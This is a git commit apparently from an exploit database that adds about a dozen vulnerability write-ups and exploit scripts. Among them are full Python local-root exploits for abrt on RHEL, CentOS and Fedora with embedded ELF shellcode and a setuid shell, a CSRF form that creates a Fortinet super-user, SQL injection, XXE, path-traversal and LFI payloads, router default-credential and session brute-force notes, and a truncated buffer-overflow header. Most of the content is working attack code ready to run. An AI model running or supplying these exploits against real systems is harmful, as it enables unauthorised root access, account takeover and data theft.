DB: 2015-12-02

14 new exploits
This commit is contained in:
Offensive Security 2015-12-02 05:02:23 +00:00
parent e1b6ec4b24
commit b6f9265856
15 changed files with 36410 additions and 0 deletions

35106
files.csv

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,146 @@
source: http://www.securityfocus.com/bid/63663/info
FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions in the context of the device running the affected application. Other attacks are also possible.
Versions prior to Fortianalyzer 4.3.7 and 5.0.5 are vulnerable.
<html>
<body onload="CSRF.submit();">
<html>
<body onload="CSRF.submit();">
<form id="csrf"
action="https://www.example.com/IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog";
method="post" name="CSRF">
<input name="userId" value="user.via.cfsr"> </input>
<input name="type" value="0"> </input>
<input name="rserver" value=""> </input>
<input name="lserver" value=""> </input>
<input name="subject" value=""> </input>
<input name="cacerts" value="Fortinet_CA2"> </input>
<input name="password" value="123456"> </input>
<input name="password_updated" value="1"> </input>
<input name="confirm_pwd" value="123456"> </input>
<input name="confirm_pwd_updated" value="1"> </input>
<input name="host_1" value="0.0.0.0/0.0.0.0"> </input>
<input name="host_2" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_3" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_4" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_5" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_6" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_7" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_8" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_9" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_10" value="255.255.255.255/255.255.255.255"> </input>
<input name="host6_1"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_2"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_3"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_4"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_5"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_6"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_7"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_8"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_9"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_10"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="profile" value="Super_User"> </input>
<input name="alladomRDGrp" value="0"> </input>
<input name="_adom" value=""> </input>
<input name="allpackRDGrp" value="0"> </input>
<input name="_adom" value=""> </input>
<input name="allpackRDGrp" value="0"> </input>
<input name="_pack" value=""> </input>
<input name="desc" value=""> </input>
<input name="showForce" value="0"> </input>
<input name="numhosts" value="0"> </input>
<input name="numhosts6" value="3"> </input>
<input name="_comp_8" value="OK"> </input>
<input name="actionevent" value="new"> </input>
<input name="profileId" value=""> </input>
<input name="mgt" value=""> </input>
<input name="dashboard" value=""> </input>
<input name="dashboardmodal" value=""> </input>
<input name="csrf_token" value=""> </input>
</form>
</body>
</html>

View file

@ -0,0 +1,120 @@
##Full Disclosure:
#Exploit Title : Belkin N150 Wireless Home Router Multiple
Vulnerabilities
#Exploit Author : Rahul Pratap Singh
#Date : 30/Nov/2015
#Home Page Link : http://www.belkin.com
#Blog Url : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched
→ Vulnerability/BUG Report :
1)
• Vulnerability Title : HTML/Script Injection
• Version : F9K1009 v1
• Firmware : 1.00.09
→ Proof of Concept:
"InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" this parameter is
vulnerable.
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
→ Steps to Reproduce:
Send the following post request using Burpsuite,etc
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260
%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D
2)
• Vulnerability Title : Session Hijacking
• Version : F9K1009 v1
• Firmware : 1.00.09
→ Proof of Concept:
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
sessionid is allocated using hex encoding and of fixed length i.e 8 .
Therefore, it is very easy to bruteforce it in feasible amount for time as
this session id ranges from 00000000 to ffffffff
→ Steps to Reproduce:
Send the following request using Burpsuite and Bruteforce the sessionid.
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
3)
• Vulnerability Title : Telnet Enabled with Default Pass
• Version : F9K1009 v1
• Firmware : 1.00.09
→ Vulnerability Details:
Telnet protocol can be used by an attacker to gain remote access to the
router with root privileges.
→ Proof of Concept:
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
→ Steps to Reproduce:
1) Open terminal
2) Type following command:
telnet 192.168.2.1
3) Default user and pass is root:root
4)
• Vulnerability Title : Cross Site Request Forgery
• Version : F9K1009 v1
• Firmware : 1.00.09
→ Proof of Concept:
Request doesn't contain any CSRF-token. Therefore, requests can be forged.
It can be verified with any request.
Status:
Vendor Notified: 20 Oct 2015
Vendor Notified Again: 25 Nov 2015
No Response.
Full Disclosure: 30 Nov 2015
Ref:
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

114
platforms/linux/local/38832.py Executable file
View file

@ -0,0 +1,114 @@
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
import os,sys,glob,time,sys,socket
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
pid = os.fork()
if pid == 0:
os.execl("/usr/bin/sleep","sleep","100")
time.sleep(0.5)
print "crashing pid %d" % pid
os.kill(pid,11)
print "waiting for dump directory"
def waitpath(p):
while 1:
r = glob.glob(p)
if len(r) > 0:
return r
time.sleep(0.05)
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
print "dump directory: ", dumpdir
os.chdir(dumpdir)
print "waiting for sosreport directory"
sosreport = waitpath("sosreport-*")[0]
print "sosreport: ", sosreport
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
print "tmpfiles: ", tmpfiles
print "moving directory"
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
print "moving tmpfiles"
for x in tmpfiles:
print "%s -> %s" % (x,x + ".old")
os.rename(x, x + ".old")
open(x, "w+").write("/tmp/hax.sh\n")
os.chmod(x,0666)
os.chdir("/")
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
def trigger():
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except: pass
time.sleep(0.5)
try:
os.stat("/tmp/sh")
except:
print "could not create suid"
sys.exit(-1)
print "success"
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
sys.exit(-1)
for x in xrange(0,60*10):
if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
print "done"
trigger()
time.sleep(1)
sys.stderr.write(".")
print "timed out"

117
platforms/linux/remote/38826.py Executable file
View file

@ -0,0 +1,117 @@
source: http://www.securityfocus.com/bid/63743/info
Linux Kernel is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information like original MAC address; information obtained may aid in other attacks.
Note: This BID was previously titled 'Atheros Wireless Drivers MAC Address Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.
#!/usr/bin/python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import random
# number of times to inject probe for one bit (combat packet loss)
ATTEMPTS_PER_BIT = 6
# time to wait for ACK in seconds
SNIFFTIME = 0.3
def randmac():
mac = [0] * 6
for i in xrange(6):
mac[i] = random.randint(0, 256)
# avoid multicast/broadcast mac
mac[0] = mac[0] & 0xFE
return ":".join([format(byte, '02x') for byte in mac])
def parsemac(macstr):
parts = macstr.replace("-", ":").split(":")
if len(parts) != 6:
raise ValueError("MAC does not consist of 6 parts (separated by : or -)")
return [int(byte, 16) for byte in parts]
def is_ack(p):
return Dot11 in p and p.type == 1 and p.subtype == 13
def find_fixed_bits(s, mac):
# eventually contains the real MAC address
orgmac = [0] * 6
# random MAC address, used as sender, to which the target will send an ACK
srcmac = randmac()
# for all the bits - FIXME: Don't consider H.O. bit of first MAC byte
for i in range(6):
for bit in range(8):
# flip the bit at current position
currbit = mac[i] & (1 << bit)
mac[i] ^= (1 << bit)
# convert modified mac to string
strmac = ":".join([format(byte, '02x') for byte in mac])
print "Probing", strmac, "...",
replied = False
for attempt in range(ATTEMPTS_PER_BIT):
# inject data packet to modified MAC address
packet = Dot11(type="Data", subtype=4, FCfield="from-DS",
addr1=strmac, addr2=srcmac, addr3=strmac)
s.send(RadioTap()/packet)
# Sniff air for ACK to modified MAC
l = sniff(lfilter=lambda p: is_ack(p) and p.addr1 == srcmac, count=1,
timeout=SNIFFTIME, opened_socket=s)
# We we got an ACK, don't need to try again
if len(l) == 1:
replied = True
break
print replied
# If client replied, original bit is different from the one currently set,
# otherwise it's equal to original bit.
if replied:
orgmac[i] |= (~currbit) & (1 << bit)
else:
orgmac[i] |= currbit
# flip bit back to original value
mac[i] ^= (1 << bit)
# Done, return original MAC
return orgmac
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:", sys.argv[0], "interface macaddr"
quit(1)
try:
mac = parsemac(sys.argv[2])
conf.iface = sys.argv[1]
random.seed()
# Open up read/write socket so we don't miss the ACK
L2socket = conf.L2socket
s = L2socket(type=ETH_P_ALL, iface=conf.iface)
# Now find the MAC
orgmac = find_fixed_bits(s, mac)
s.close()
print "\nReal MAC address:", ":".join(format(byte, "02x") for byte in orgmac), "\n"
except ValueError, e:
print "Invalid MAC address:", e
except socket.error, e:
print "Error with provided interface:", e

View file

@ -0,0 +1,21 @@
# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report:
http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a
kodi web interface vulnerable to arbitrary file read.
example:
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
for passwd
(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)

219
platforms/multiple/local/38835.py Executable file
View file

@ -0,0 +1,219 @@
#!/usr/bin/python
# CVE-2015-5273 + CVE-2015-5287
# CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too)
# abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage
# rebel 09/2015
# ----------------------------------------
# [user@localhost ~]$ id
# uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# [user@localhost ~]$ cat /etc/redhat-release
# CentOS Linux release 7.1.1503 (Core)
# [user@localhost ~]$ python abrt-centos-fedora.py
# -- lots of boring output, might take a while on a slow connection --
# /var/spool/abrt/abrt-hax-coredump created
# executing crashing process..
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
import time,os,datetime,sys,resource,socket
fedora = "Fedora" in open("/etc/redhat-release").read()
# mkdir dir1
# ln -s /var/spool/abrt dir1/hax
# mkdir dir2
# mkdir dir2/hax
# ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump
# cd dir1
# find . -depth -print | cpio -o > ../cpio1
# cd ../dir2
# find . -depth -print | cpio -o > ../cpio2
cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip")
cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip")
if fedora:
cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt")
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
# we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries
# and we can't control the contents of that region. on 32 bit binaries [stack] is at the end
# the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written
# to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp
elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip")
# most people don't have nasm installed so i preassembled it
# if you're not brave enough to run the preassembled file, here's the code :)
"""
; abrt-hax.asm
; nasm -f bin -o abrt-hax abrt-hax.asm
BITS 32
org 0x08048000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1, 0 ; e_ident
times 8 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 5 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
inc esp
cmp dword [esp],0x706d742f
jne l
or esp,0xfff
inc esp
mov edx,500
l3:
mov ecx,msglen
mov ebx,message
sub esp,ecx
l2:
mov al,[ebx]
mov [esp],al
inc esp
inc ebx
loop l2
sub esp,msglen
dec edx
cmp edx,0
jne l3
mov eax,0x41414141
jmp eax
message db '////////tmp/hax.sh',0x0a,0
msglen equ $-message
"""
build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1]
os.chdir("/tmp")
open("build_ids","w+").write(build_id + "\n")
print build_id
def child():
timestamp = int(time.time())
for i in xrange(0,3):
try:
t = datetime.datetime.fromtimestamp(timestamp+i)
d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid())
os.mkdir(d)
os.chmod(d,0777)
os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio")
print "created %s" % d
except: pass
os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y")
try:
os.mkfifo("/var/tmp/haxfifo")
os.chmod("/var/tmp/haxfifo",0666)
except:
pass
def fifo(a):
print "reading from fifo.."
open("/var/tmp/haxfifo").read()
print "done"
print "writing to fifo.."
open("/var/tmp/haxfifo","w+").write(a)
print "done"
if os.fork() == 0: child()
print "first cpio..."
fifo(cpio1)
os.wait()
time.sleep(1)
if os.fork() == 0: child()
print "second cpio..."
fifo(cpio2)
os.wait()
time.sleep(1)
if fedora:
sym = "/var/tmp/abrt/abrt-hax-coredump"
else:
sym = "/var/spool/abrt/abrt-hax-coredump"
try:
os.lstat(sym)
except:
print "could not create symlink"
sys.exit(-1)
print "%s created" % sym
open("/tmp/abrt-hax","w+").write(elf)
os.chmod("/tmp/abrt-hax",0755)
if os.fork() == 0:
resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,))
print "executing crashing process.."
os.execle("/tmp/abrt-hax","",{})
os.wait()
time.sleep(1)
if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read():
print "could not modify /proc/sys/kernel/modprobe"
sys.exit(-1)
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try:
socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except:
pass
time.sleep(0.5)
try:
os.stat("/tmp/sh")
except:
print "could not create suid"
sys.exit(-1)
print "success"
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')

View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/63719/info
IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>

View file

@ -0,0 +1,24 @@
# Vulnerability title: ntop-ng <= 2.0.151021 - Privilege Escalation
# Author: Dolev Farhi
# Contact: dolev at flaresec.com
# Vulnerable version: 2.0.151021
# Fixed version: 2.2
# Link: ntop.org
# Date 27.11.2015
# CVE-2015-8368
# Product Details:
ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.
# Vulnerability Details:
in the latest stable release of ntop-ng it is possible to escalate the privileges of a non-privileged user to the admin account by resetting the password, intercepting the request and replacing the HTTP parameters.
# Vulnerability Proof of concept
1. Login with an unprivileged account
2. Change the account password and intercept the request, modify the username= and Cookie user= and change to the admin account
Example:
GET /lua/admin/password_reset.lua?csrf=XXXXXXXXXXXXXXXXXX&username=admin&old_password=12345&new_password=123456&confirm_new_password=123456 HTTP/1.1
Cookie: user=admin; session=XXXXXXXXXXXXXXXXXXXXXXXXX
3. Login with the admin account and the password you defined in step #3.
Voila! you're an administrator.

19
platforms/php/remote/38827.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/63754/info
Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Nagios XI 2012R2.4 are vulnerable.
POST /nagiosql/index.php HTTP/1.1
Host: localhost
Content-Length: 69
Origin: http://locahost
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76
Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/nagiosql/
Cookie: PHPSESSID=httj04vv2g028sbs73v9dqoqs3
tfUsername=test&tfPassword=%27%29+OR+1%3D1+limit+1%3B--+&Submit=Login

54
platforms/php/webapps/38828.php Executable file
View file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/63771/info
Limonade framework is prone to a local file-disclosure vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Limonade framework 3.0 vulnerable; other versions may also be affected.
<?php
/** To prevent of time out **/
set_time_limit(0);
/** Error reporting **/
error_reporting(0);
/** Necessary variables **/
$url = $argv[1];
$data = $argv[2];
$needle = $argv[3];
/** Curl function with appropriate adjustments **/
function CurlPost($url='localhost',$data=array())
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_TIMEOUT,50);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
return curl_exec($ch);
curl_close($ch);
}
list($param,$file) = explode(':',$data);
$FilterBypassing = '....//';
for($i=0;$i<10;$i++)
{
$DataToPost[$param] = $FilterBypassing.$file;
$response = CurlPost($url,$DataToPost);
if(strstr($response,$needle)!==FALSE)
{
echo $response;
echo "\n\nExploited successfully!\n";
echo 'Payload: ',$DataToPost[$param],"\n\n\n";
die();
}
$FilterBypassing .= '....//';
}
?>

88
platforms/php/webapps/38831.txt Executable file
View file

@ -0,0 +1,88 @@
=== LSE Leading Security Experts GmbH - Security Advisory 2015-10-14 ===
HumHub - SQL-Injection
------------------------------------------------------------------------
Tested Versions
===============
HumHub 0.11.2 and 0.20.0-beta.2
Issue Overview
==============
Vulnerability Type: 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Technical Risk: high
Likelihood of Exploitation: high
Vendor: HumHub GmbH & Co. KG
Vendor URL: https://www.humhub.org
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
Advisory URL: https://www.lsexperts.de/advisories/lse-2015-10-14.txt
Advisory Status: Public
CVE-Number: ----
CVE URL: ---
Impact
======
Enables to read and modify the HumHub Mysql Database.
Issue Description
=================
While conducting an internal software evaluation, LSE Leading
Security Experts GmbH discovered that the humhub social networking
software is subject to an sql-injection attack.
Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to block
access to the humhub software until the vendor
provides a patch.
Proof of Concept
================
Opening the following URL
http://localhost/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5%27%22&mode=normal
shows the SQL-error, which is easily exploitable using sqlmap.
./sqlmap.py -u 'http://localhost:9933/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5&mode=normal' --cookie='pm_getting-started-panel=expanded; pm_new-people-panel=expanded; pm_user-statistics-panel=expanded; pm_new-spaces-panel=expanded; pm_spaces-statistics-panel=expanded; sin=f9vou17vnik100rrr5b26v8ip3; CSRF_TOKEN=d94129bfdd49e5d2c628928228519cd6b2c9cf54' --level=2 --risk=2 -p from -a
...
---
Parameter: from (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=-4670 OR 5804=5804#&mode=normal
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT 7208 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(7208=7208,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=normal
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5;(SELECT * FROM (SELECT(SLEEP(5)))OXGN)#&mode=normal
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT * FROM (SELECT(SLEEP(5)))nBYr)&mode=normal
---
History
=======
2015-10-14 Issue discovered
2015-10-15 Vendor contacted
2015-10-15 Vendor response and hotfix
2015-10-20 Vendor releases fixed versions
2015-11-30 Advisory release
GPG Signature
=============
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc

83
platforms/php/webapps/38841.txt Executable file
View file

@ -0,0 +1,83 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt
Vendor:
====================
www.zenphoto.org
Product:
===================
Zenphoto 1.4.10
Vulnerability Type:
========================
Local File Inclusion
CVE Reference:
==============
N/A
Vulnerability Details:
======================
Zen Photos pluginDoc.php PHP file is vulnerable to local file inclusion
that allows attackers
to read arbitrary server files outside of the current web directory by
injecting "../" directory traversal
characters, which can lead to sensitive information disclosure, code
execution or DOS on the victims web server.
Local File Inclusion Codes:
==========================
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1&extension=../../../xampp/phpinfo
Disclosure Timeline:
=====================
Vendor Notification: November 10, 2015
December 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
High
Description:
=====================================================
Request Method(s): [+] GET
Vulnerable Product: [+] Zenphoto 1.4.10
Vulnerable Parameter(s): [+] extension
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

View file

@ -0,0 +1,78 @@
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
